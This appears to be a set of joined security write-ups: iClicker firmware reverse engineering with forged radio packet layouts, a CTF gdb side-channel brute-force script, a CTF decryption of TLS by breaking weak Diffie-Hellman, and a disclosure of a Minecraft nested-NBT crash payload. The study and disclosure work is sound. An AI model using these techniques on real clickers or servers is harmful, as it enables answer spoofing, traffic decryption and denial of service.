ROM:0830                 ldi     r30, 0xA0
ROM:0831                 ldi     r31, 0x8B
ROM:0832                 st      -Y, r31
ROM:0833                 st      -Y, r30
ROM:0834                 call    read_write_two_bytes_SPI

Now if we consult with the XE1203F’s documentation, it mentions the following:

The timing diagram of a write sequence is illustrated in Figure 12 below. The sequence is initiated when a Start condition is detected, defined by the SI signal being set to “0” during one period of SCK. The next bit is a read/write (R/W) bit which should be “0” to indicate a write operation. The next 5 bits contain the address of the configuration/status registers A[4:0] to be accessed, MSB first (see 5.2). Then, the next 8 bits contain the data to be written into the register. The sequence ends with 2 stop bits set to “1”.

Okay cool, now if we take a closer look at the bytes being written out on the SPI interface as binary, we see the following:

0x8A          0xF

1000 1010   0000 1111

Compare this against the timing diagram from the datasheet above, looks fairly similar! If we plot it out and label the bits, we see the following:

Great, so this is code that is writing a value to a configuration register in the radio chip. Notably it’s writing the value 0xF to the register at address 0x01010. I confirmed this theory by decoding a few more SPI writes.

Register Value Description
0x01010 0x0F Frequency Adjustment MSB
0x01011 0xA0 Frequency Adjustment LSB
0x00010 0x1F Frequency Band 902–928 MHz

Following the formula in the datasheet, we can see that the frequency will be the base frequency plus 500 times the frequency adjustment registers interpreted as a 16 bit two’s compliment number.

Frequency Base = 915 Mhz
Frequency Adjustment = 0x0FA0 = 4000

Final Frequency = (915 Mhz) + (4000 * 500 Hz)
                = 917 Mhz

and if we check this against the first paper linked above, we can confirm that they experimentally figured out the default AA channel operates at 917.0 MHz.

Great, this discovery lets us figure out exactly what parameters the radio module is using and helped find the portion of the code responsible for changing frequencies.

Radio Data IO

So the SPI protocol is how the radio module is configured, but looking at the data sheet we can see that there is a separate DATAIN and DATA port used to read and write actual radio packets. My first intuition was that the firmware might be making use of the AVR USART (Universal Synchronous/Asynchronous Receiver/Transmitter) feature to exchange data with the radio chip.

However, after looking at the interrupt handlers for USART_RXC and USART_TXC which correspond to when a byte is sent or received by the USART module, it seemed clear that this is actually how the base station communicates with the instructor’s computer and NOT where radio messages were read/sent.

Within AVR, IO is primarily done using the in and out instructions. The only interesting traces I could find for the in instruction was in the INT1 interrupt handler which corresponds to a configurable external interrupt handler. The following is psuedo-C like code that corresponds to the handler:

int8_t radio_bytes_read = 0;

int8_t radio_bits_to_read = 8;
int8_t radio_bytes_to_read = n;

extern int8_t* radio_bytes;

void INT1() {
    while (radio_bytes_to_read > 0) {
        while (radio_bits_to_read > 0) {
            int8_t current_byte = radio_bytes[radio_bytes_read];

            if (PIND_5 is high) {
                current_byte |= 1;
            current_byte = current_byte << 1;

            radio_bytes[radio_bytes_read] = current_byte;
        radio_bits_to_read = 8;

And bingo, now that we know where radio_bytes array is in memory, we can look at cross references to it to find the code that processes packets sent over the radio.

Dynamic analysis

After a large portion of just statically analyzing the disassembled code, I decided to use the fantastic avrsim project that allows you to run avr binaries and even attach gdb to it.

I took the example code in examples/board_simduino/simduino.c and customized it to my needs. The first most obvious change to make is to change the MMCU to atmega16.

Next up was setting the appropriate bit and raising the external interrupts to emulate the radio module receiving bytes.

void send_byte(unsigned char b, avr_irq_t* radio_in, avr_extint_t* extint, avr_t* avr) {
    for (int i = 7; i >= 0; i--) {
        for (int j = 0; j < 200000; j++) {

        int bit = (b >> i) & 1;
        printf("Writing bit %d\n", bit);
        avr_raise_irq(radio_in, bit);
        avr_raise_interrupt(avr, &extint->eint[1].vector);

int main(int argc, char** argv) {
    int interrupted = 0;

    while (1) {
        int state = avr_run(avr);
        if ( state == cpu_Done || state == cpu_Crashed) {

        // divide by 2 to get "word" addresses like IDA uses
        unsigned int curr_pc = avr->pc / 2;
        if (curr_pc == 0x18E && !interrupted) {
            // Perform an INT0 interrupt
            avr_raise_interrupt(avr, &extint->eint[0].vector);
            printf("Raising AVR INT0 interrupt\n");

            // Raw ID = 0xA2 0x46 0x53 0xB7
            // My encoded ID = 0x14 0x8C 0x29 0x70
            send_byte(0x14, radio_in, extint, avr);
            send_byte(0x8C, radio_in, extint, avr);
            send_byte(0x29, radio_in, extint, avr);
            // Sending an answer of 'B' (0x05)
            unsigned char last_id = 0x70;
            last_id &= 0xF0;
            last_id |= 0x05;
            send_byte(last_id, radio_in, extint, avr);

            // compute the checksum
            unsigned char checksum = 0x14 + 0x8C + 0x29 + last_id;
            send_byte(checksum, radio_in, extint, avr);

            interrupted = 1;

Protocol Findings

Hopefully the last section gives you some insight on what the reverse engineering process was like, not too harp on it too much, let’s move on to the actual findings in terms of the radio protocol:

Welcome ping packet

The base station sends out this packet on regular intervals (every few seconds), it contains the welcome message as shown on the iClicker like this:

as well as the question mode being used, which can either be the standard A/B/C/D/E multiple choice mode, numeric alphanumeric or a sequence of questions.

Packet details

Byte Description
0-5 Fixed header (Radio sync bytes)
0x55 0x55 0x55 0x36 0x36 0x36
6-13 Welcome message
(note this is not ascii, see below)
14 Mode byte 1
15-16 Number of questions
(for multiple question modes)
17 Mode byte 2
18 Checksum
(sum of bytes 6-17)

The mode bytes are as follows:

Mode Mode Byte 1 Mode Byte 2
Multiple Choice 0x92 0x62
Numeric Mode 0x93 0x63
Alphanumeric Mode 0x9B 0x6B
Multiple Numeric 0x94 0x64
Multiple Alphanumeric 0x9C 0x6C

Here are some examples of a welcome packets.

This causes the iClicker to show IREVERSE on screen and puts it in the multiple choice mode.

0    1    2    3    4    5    6    7    8    9    10   11   12   13   14   15   16   17   18
0x55 0x55 0x55 0x36 0x36 0x36 0x93 0x9C 0x8F 0xA0 0x8F 0x9C 0x9D 0x8F 0x92 0xAA 0xAA 0x62 0xFD
 ^-------------------------^  ^---------- Welcome Message ----------^  ^   ^-------^  ^    ^
  Header/Radio sync bytes     'I'  'R'  'E'  'V'  'E'  'R'  'S'  'E'   │    Useless   |  Checksum
                                                                       │              |
                                                      Question Mode (Multiple Choice) ┙

This causes the iClicker to show 2+2=5 on screen and allows 8 questions to be answered in alphanumeric mode.

0    1    2    3    4    5    6    7    8    9    10   11   12   13   14   15   16   17   18
0x55 0x55 0x55 0x36 0x36 0x36 0x82 0xA6 0x82 0xA7 0x85 0x00 0x00 0x00 0x9C 0x08 0x00 0x6C 0xE6
 ^-------------------------^  ^---------- Welcome Message ----------^  ^   ^-------^  ^    ^
  Header/Radio sync bytes     '2'  '+'  '2'  '='  '5'  ' '  ' '  ' '   │  8 in little |  Checksum
                                                                       │    endian    |
                                                                       |              |
                                                Question Mode (Multiple Alphanumeric) ┙

Text encoding

As mentioned earlier, the welcome message isn’t a normal encoding like ASCII, it seems custom rolled.

  • 1 to 9 are from 0x81 to 0x89.

  • 0 is represented by 0x8A.

  • A starts at 0x8B and goes up sequentially like ASCII.

  • - is 0xA5.

  • + is 0xA6.

  • = is 0xA7.

  • ? is 0xA8.

  • _ is 0xA9.

  • Any other bytes will show a blank.

Multiple choice answer ACK packet

Sent to acknowledge an answer for a multiple choice question. These involve calculations on the encoded iClicker id, which I will refer to as an array called encodedId.


(Shows a tick on the iClicker screen)

Bytes Description
0-2 Fixed header (Radio sync bytes)
0x55 0x55 0x55
3 Byte 0 of the encoded iClicker ID (encodedId[0])
4 Byte 1 of the encoded iClicker ID (encodedId[1])
5 Bitwise negation of byte 2 of the ID (~encodedId[2])
6 (encodedId[3] & 0xF0) | 0x02
7 Constant 0x22


(Shows closed on the iClicker screen)

Bytes Description
0-2 Fixed header (Radio sync bytes)
0x55 0x55 0x55
3 Byte 0 of the encoded iClicker ID (encodedId[0])
4 Byte 1 of the encoded iClicker ID (encodedId[1])
5 Bitwise negation of byte 2 of the ID (~encodedId[2])
6 (encodedId[3] & 0xF0) | 0x06
7 Constant 0x66


My iClicker ID is A24653B7, which encodes to 0x14 0x8C 0x29 0x75 when answering B.

Let’s calculate the bitwise negation of my encodedId[2]:

0x29 = 0b00101001
    ~= 0b11010110 = 0xD6

Thus, a positive acknowledgement packet for this answer would be:

0x55 0x55 0x55  0x14 0x8C 0xD6 0x72 0x22

And a negative acknowledgement packet would be:

0x55 0x55 0x55  0x14 0x8C 0xD6 0x76 0x66

Side note: I haven’t documented the ACK packets for other question modes since I figured there’s not a lot of interest for those, please let me know if you’d like to see those.


This was my first real project reverse engineering a large real-world project, especially so in the embedded space. Compared to reverse engineering x86 a bigger chunk of time was spent reading datasheets for the hardware components, especially the Atmel processor. The lack of strings, system calls etc also make it a lot harder to orient yourself and find your way around the code.

I’ve posted my IDA database and a text dump of the firmware on Github. Feel free to reach out to me if you have any questions.

Problem Description

Deep on the web, I discovered a secret key validation. It appeared to be from the future, and it only had one sentence: “Risk speed for security”. Something seems fishy, you should try to break the key and find the secret inside!


The binary

Welp, this binary was movfuscated:

08048794 <check_element>:
 8048794:	a1 88 d2 3f 08       	mov    eax,ds:0x83fd288
 8048799:	ba 94 87 04 88       	mov    edx,0x88048794
 804879e:	a3 10 d1 1f 08       	mov    ds:0x81fd110,eax
 80487a3:	89 15 14 d1 1f 08    	mov    DWORD PTR ds:0x81fd114,edx
 80487a9:	b8 00 00 00 00       	mov    eax,0x0
 80487ae:	b9 00 00 00 00       	mov    ecx,0x0
 80487b3:	ba 00 00 00 00       	mov    edx,0x0
 80487b8:	a0 10 d1 1f 08       	mov    al,ds:0x81fd110
 80487bd:	8b 0c 85 20 77 05 08 	mov    ecx,DWORD PTR [eax*4+0x8057720]
 80487c4:	8a 15 14 d1 1f 08    	mov    dl,BYTE PTR ds:0x81fd114
 80487ca:	8a 14 11             	mov    dl,BYTE PTR [ecx+edx*1]
 80487cd:	89 15 00 d1 1f 08    	mov    DWORD PTR ds:0x81fd100,edx
 80487d3:	a0 11 d1 1f 08       	mov    al,ds:0x81fd111
 80487d8:	8b 0c 85 20 77 05 08 	mov    ecx,DWORD PTR [eax*4+0x8057720]
 80487df:	8a 15 15 d1 1f 08    	mov    dl,BYTE PTR ds:0x81fd115
 80487e5:	8a 14 11             	mov    dl,BYTE PTR [ecx+edx*1]
 80487e8:	89 15 04 d1 1f 08    	mov    DWORD PTR ds:0x81fd104,edx
 80487ee:	a0 12 d1 1f 08       	mov    al,ds:0x81fd112
 80487f3:	8b 0c 85 20 77 05 08 	mov    ecx,DWORD PTR [eax*4+0x8057720]
 80487fa:	8a 15 16 d1 1f 08    	mov    dl,BYTE PTR ds:0x81fd116

Initially we tried using demovfuscator but all this really did was turn a few movs into leas but nothing too useful.

Instead, we used demovfuscator’s -g option to generate the control flow graph of the program which looked like this:

movfuscator control flow graph

Since the program was exiting on a wrong input, I decided to experiment by adding a breakpoint at the first branch and take a look around in gdb. This breakpoint was being hit thousands of times so I used ignore <bp> 1000000 to quickly check how many times which resulted in a really interesting output:

[Inferior 1 (process 24054) exited with code 01]
pwndbg> i breakpoints
Num     Type           Disp Enb Address    What
2       breakpoint     keep y   0x0805262f <main+8901>
    breakpoint already hit 6018 times

[Inferior 1 (process 24082) exited with code 01]
pwndbg> i breakpoint
Num     Type           Disp Enb Address    What
3       breakpoint     keep y   0x0805262f <main+8901>
    breakpoint already hit 4012 times

Notice that when correct input is provided, the breakpoint is hit more often. Now that we have an indicator to know that one character of input is correct, we can go ahead and exploit this to recover the flag.

(Note: handle SIGSEGV nostop noprint pass and handle SIGILL nostop noprint pass are required to debug in gdb since movfuscator uses signal handlers on SIGSEGV and SIGILL for function calls and loops)

Exploiting the side channel

We whipped up a quick gdb script to automate the process of monitoring the breakpoints:

import gdb
import string

valid_chars = string.printable

gdb.execute("file future_fun")
gdb.execute("handle SIGSEGV nostop noprint pass")
gdb.execute("handle SIGILL nostop noprint pass")

class MyBreakpoint(gdb.Breakpoint):
    def stop(self):
        return False

bp = MyBreakpoint("*0x805262f")
bp.ignore_count = 90000000

flag = ""
while not flag.endswith("}"):
    for char in valid_chars:
        bp.hit_count = 0

        newflag = flag + char

        with open("flagfile", "w") as f:
            f.write(newflag + "%")

        exec_command = 'r < flagfile > /dev/null'
        gdb.write("Trying: " + newflag + "\n")

        if bp.hit_count > (len(newflag) + 1) * 1000:
            gdb.write("[!] Found character: " + newflag + "\n")
            flag = newflag
            gdb.write("Hits: {}\n".format(bp.hit_count))

This script tries each printable character and if we hit the breakpoint a thousand times more than the last, we know it was correct.

After running for a few minutes, the flag was recovered successfully.

Recovery in progress

Problem Description

Ever since their hella successful ICO, the crypto experts at VapeCoinIO have put developers first with their simple, intuitive, and, most importantly, secure API. Once you’ve created your account and set up your wallet, you can access it programmatically using your VapeID by sending a GET request to /api/login?key=<HASH> where <HASH> is your VapeID. Your wallet is transferred to you over TLS, so don’t worry—it’s really, really secure. In fact, it’s so secure that the founder and CEO of VapeCoinIO uses the API for his personal Brainwallet.

One of your contacts is a site-reliability engineer at VapeCoinIO. He has obtained a PCAP of a TLS session with a client originating from an IP he suspects to be used by CEO’s personal laptop. Perhaps he accessed his wallet! Can you find a way to recover its contents?


Inspecting the packet capture

As the problem description says, the first thing we notice in the PCAP is that the data is transferred exclusively over a TLS connection. Thus the first thing we need to look for is something amiss in the TLS exchange such as the use of a weak cipher.

We can see in the PCAP that the TLS connection is using: TLS_DHE_RSA_WITH_AES_128_GCM_SHA256

DHE stands for “Diffie-Hellman ephemeral” which is where the RSA key is used to sign the server’s Diffie-Hellman public number to provide authenticity and every TLS session uses a new set of public numbers.

Looking at the Diffie-Hellman numbers in wireshark, we notice something very interesting:

Wireshark Disection TLS Exchange

Those numbers look absolutely tiny! Diffie-Hellman’s security is based on the difficulty of the Discrete Logarithm problem. Ordinarily the p (prime) for DH is a 2048 bit number, here it’s an abysmal 32 bits making it trivial to compute discrete logarithms on. SageMath has several algorithms built in to compute discrete logs so we wrote up a quick script to recover the client’s secret number.

p = 0xf661398b
g = 0x02
client_public = 0x42b2769b
server_public = 0x916ddb94

k = GF(p)
client_secret = discrete_log_lambda(k(client_public), k(g), (1,2**32))
# 0x5ec3d070

The client secret is then enough to compute the shared secret. This is known as the pre-master secret in TLS terms which is all wireshark needs to decrypt TLS traffic.

premaster_secret = pow(server_public, client_secret, p)
# 0xf5ca9f85

Decrypting with Wireshark

In order to let Wireshark utilize this, it needs a file mapping TLS sessions to the master or pre-master secrets. So we made a file called keylogfile.txt containing:

PMS_CLIENT_RANDOM 358970edf3544c1181cecf3369cd4c0e69be2c3605662ba1288b251161eba51e f5ca9f85

PMS stands for Pre-Master Secret and the giant number in the middle is the client random, sent as part of the Client Hello packet which is what wireshark uses to map the PMS to the right TLS session.

(Note: wireshark displays the timestamp and random bytes seperately if you expand the Random portion in the TLS packet, the client random is the timestamp and random bytes together.)

We set up Wireshark’s TLS protocol settings to use the log file:

Wireshark TLS Preferences

and boom, follow the TLS stream in Wireshark for the flag:

Wireshark TLS Stream

A lesson on data structures, networking protocols, data sanitization and disclosure

Around 2 years ago, I was enthusiastically working on Spigot and Bukkit along with a couple of fairly popular plugins. During my poking around within the networking internals of Minecraft, I came across a fairly substantial problem that allowed anyone to send certain malformed packets and crash a server by running it out of memory.

Following the defacto standard procedure, I responsibly and privately disclosed the problem to Mojang on 10th July, 2013. That’s nearly 2 years ago. I asked for updates in one month intervals over the course of 3 months and was ignored or given highly unsatisfactory responses. I kept my hopes up that the problem would be patched and checked the source code on new releases whenever I could.

The version of the game when the vulnerability was reported was 1.6.2, the game is now on version 1.8.3. That’s right, 2 major versions and dozens of minor versions and a critical vulnerability that allows you to crash any server, and starve the actual machines of CPU and memory was allowed to exist.

The technical details

The minecraft protocol enables the exchange of information about what an inventory slot contains. This allows you to, for example, get the items in your hotbar when you log in. Items in minecraft also contain a feature that allows them to store arbitary metadata (used for enhancements, books etc). This metadata is stored in a format known as NBT. The NBT format is essentially like JSON but in binary form. This allows it to store complex data structures with nesting and the like.

For example, the NBT metadata (known as a tag) for a book might look something like this

tag: {
    author: "ammar2",
    title: "Kitteh",
    pages: ["Kitties are cute", "I like kitties"]

The vulnerability stems from the fact that the client is allowed to send the server information about certain slots. This, coupled with the NBT format’s nesting allows us to craft a packet that is incredibly complex for the server to deserialize but trivial for us to generate.

In my case, I chose to create lists within lists, down to five levels. This is a json representation of what it looks like.

rekt: {
    list: [
        list: [
            list: [
                list: [
                    list: [
                        list: [
                        list: [
                        list: [
                        list: [

The root of the object, rekt, contains 300 lists. Each list has a list with 10 sublists, and each of those sublists has 10 of their own, up until 5 levels of recursion. That’s a total of 10^5 * 300 = 30,000,000 lists. And this isn’t even the theoretical maximum for this attack. Just the nbt data for this payload is 26.6 megabytes. But luckily minecraft implements a way to compress large packets, lucky us! zlib shrinks down our evil data to a mere 39 kilobytes.

Note: in previous versions of minecraft, there was no protocol wide compression for big packets. Previously, NBT was sent compressed with gzip and prefixed with a signed short of its length, which reduced our maximum payload size to 2^15 - 1. Now that the length is a varint capable of storing integers up to 2^28, our potential for attack has increased significantly. (for the more technically minded people, we fill the list up with TAG_ENDs, which aren’t accounted for by the accumulator Mojang attempted to implement to fix this)

When the server will decompress our data, it’ll have 27 megs in a buffer somewhere in memory, but that isn’t the bit that’ll kill it. When it attempts to parse it into NBT, it’ll create java representations of the objects meaning suddenly, the sever is having to create several million java objects including ArrayLists. This runs the server out of memory and causes tremendous cpu load.

This vulnerability exists on almost all previous and current minecraft versions as of 1.8.3, the packets used as attack vectors are the 0x08: Block Placement Packet and 0x10: Creative Inventory Action.

The fix for this vulnerability isn’t exactly that hard, the client should never really send a data structure as complex as NBT of arbitrary size and if it must, some form of recursion and size limits should be implemented. These were the fixes that I recommended to Mojang 2 years ago.

Proof of concept

A proof of concept of this exploit can be seen here on my Github repo. The code to generate the posioned nbt can be seen in start.py. The code has been tested under python 2.7, once you have connected to a server simply enter exploit in the command line and the packet will be sent to the server.


I thought a lot before writing this post, on the one hand I don’t want to expose thousands of servers to a major vulnerability, yet on the other hand Mojang has failed to act upon it. Mojang is no longer a small indie company making a little indie game, their software is used by thousands of servers, hundreds of thousands of people play on servers running their software at any given time. They have a responsibility to fix and properly work out problems like this. In addition, it should be noted that giving condescending responses to white hats who are responsibly disclosing vulnerabilities and trying to improve a product they enjoy is a sure fire way to get developers dis-interested the next time they come across a bug like this.


  1. 28th July, 2013: First contact with mojang employee about the issue, vulnerability disclosed and proof of concept provided.

  2. 19th August, 2013: Second time asking about fix, response given that its being worked on.

  3. 24th September, 2013: Third contact with employee, told that the problem has been delegated.

  4. 25th October, 2013: Fourth time I attempted to contact employee, ignored.

  5. 27th October, 2013: Another attempt to contact, ignored again. (at this point, I patiently waited for a fix)

In retrospect, yes, I should have given them a final warning sometime recently before this but I just expected to be shot down again

Update: With the release of this full disclosure I have actually made contact with mojang and they are working to fix the issue. Apparently the initial fix they tried failed which indicates a lack of proper testing.

Update 2: The exact problem that caused this bug to go unpatched has been identified. Mojang attempted to implement a fix for this problem, however they did not test their fix against the proof of concept I provided, which still crashed the server perfectly fine. This, in combination with ignoring me when I asked for status updates twice led me to believe that Mojang had attempted no fix. In retrospect, a final warning before this full disclosure more recently was propbably in order. A combination of mis-communication and lack of testing led to this situation today, hopefully it can be a good learning experience.

Update 3: This problem has been patched as of minecraft version 1.8.4


I’m happy to see that multiple other security issues have also been fixed. Once again, I feel better communication would have easily alleviated this problem. Keeping me in the loop and not ignoring me, in addition to proper testing would have easily led to this exploit being fixed long ago.

Edit: In regards to the statements that I never filed a report on their bug tracker, I’d just like to point out that nobody pointed me towards the tracker when I reported the issue, I wasn’t asked to make a ticket or told that I could follow the progress of the report on x-ticket.